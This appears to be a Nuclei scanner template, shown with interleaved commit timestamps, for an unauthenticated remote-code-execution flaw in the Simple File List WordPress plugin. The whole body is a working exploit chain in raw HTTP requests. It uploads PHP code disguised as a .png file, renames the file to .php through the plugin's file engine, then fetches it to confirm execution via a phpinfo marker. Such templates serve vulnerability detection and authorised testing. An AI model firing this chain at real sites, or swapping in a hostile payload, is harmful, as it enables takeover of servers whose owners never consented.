2021-03-10 11:36:11 +00:00
id : wordpress-rce-simplefilelist
info :
2022-06-03 19:12:31 +00:00
name : WordPress SimpleFilelist - Remote Code Execution
2021-03-10 11:36:11 +00:00
author : princechaddha
severity : critical
2021-04-27 11:02:08 +00:00
description : |
2022-06-03 19:12:31 +00:00
Simple File List WordPress plugin was found to be vulnerable to an unauthenticated arbitrary file upload leading to remote code execution. The Python exploit first uploads a file containing PHP code but with a png image file extension. A second request is sent to move (rename) the png file to a PHP file.
2022-04-22 10:38:41 +00:00
reference :
- https://wpscan.com/vulnerability/10192
2022-06-03 19:12:31 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
2023-10-14 11:27:55 +00:00
cvss-score : 10
2022-06-03 19:12:31 +00:00
cwe-id : CWE-77
2023-04-28 08:11:21 +00:00
metadata :
max-request : 3
2023-05-23 08:06:55 +00:00
tags : wp,wpscan,wordpress,wp-plugin,rce,intrusive,fileupload
2023-05-23 08:05:51 +00:00
variables :
filepath : '{{rand_base(7, "abcdefghi")}}'
2021-03-10 11:36:11 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-03-10 11:36:11 +00:00
- raw :
- |
POST /wp-content/plugins/simple-file-list/ee-upload-engine.php HTTP/1.1
Host : {{Hostname}}
Accept : */*
Content-Type : multipart/form-data; boundary=6985fa39c0698d07f6d418b37388e1b2
--6985fa39c0698d07f6d418b37388e1b2
Content-Disposition : form-data; name="eeSFL_ID"
1
--6985fa39c0698d07f6d418b37388e1b2
Content-Disposition : form-data; name="eeSFL_FileUploadDir"
/wp-content/uploads/simple-file-list/
--6985fa39c0698d07f6d418b37388e1b2
Content-Disposition : form-data; name="eeSFL_Timestamp"
1587258885
--6985fa39c0698d07f6d418b37388e1b2
Content-Disposition : form-data; name="eeSFL_Token"
ba288252629a5399759b6fde1e205bc2
--6985fa39c0698d07f6d418b37388e1b2
2023-05-23 08:05:51 +00:00
Content-Disposition : form-data; name="file"; filename="{{filepath}}.png"
2021-03-10 11:36:11 +00:00
Content-Type : image/png
2023-05-23 08:05:51 +00:00
<?php echo md5("wordpress-rce-simplefilelist"); phpinfo(); ?>
2021-03-10 11:36:11 +00:00
--6985fa39c0698d07f6d418b37388e1b2--
- |
POST /wp-content/plugins/simple-file-list/ee-file-engine.php HTTP/1.1
Host : {{Hostname}}
2021-09-09 06:39:13 +00:00
X-Requested-With : XMLHttpRequest
2021-03-10 11:36:11 +00:00
Accept : */*
Content-Type : application/x-www-form-urlencoded
2023-05-23 08:05:51 +00:00
eeSFL_ID=1&eeFileOld={{filepath}}.png&eeListFolder=%2F&eeFileAction=Rename%7C{{filepath}}.php
2021-03-10 11:36:11 +00:00
- |
2023-05-23 08:05:51 +00:00
GET /wp-content/uploads/simple-file-list/{{filepath}}.php HTTP/1.1
2021-03-10 11:36:11 +00:00
Host : {{Hostname}}
matchers-condition : and
matchers :
- type : word
2023-05-23 08:05:51 +00:00
part : body
2021-03-10 11:36:11 +00:00
words :
2023-05-23 08:05:51 +00:00
- "aa5be3e9dec96f2f1a593b2f5b2288af"
2021-04-27 06:42:41 +00:00
- "PHP Version"
- "Configuration Command"
2021-04-27 09:55:28 +00:00
condition : and
2023-05-23 08:05:51 +00:00
2021-03-10 11:36:11 +00:00
- type : status
status :
2021-04-13 12:56:30 +00:00
- 200
2023-10-20 11:41:13 +00:00
# digest: 4a0a0047304502210088879930bf5b174bea66061e2d725fb2e206648d3a8f13f3a36b8f10ca64be7b022069e37edf7eff0d66f5ce9627d277362b44bf27f57aeda0c3127303d0466a8b8d:922c64590222798bb761d5b6d8e72950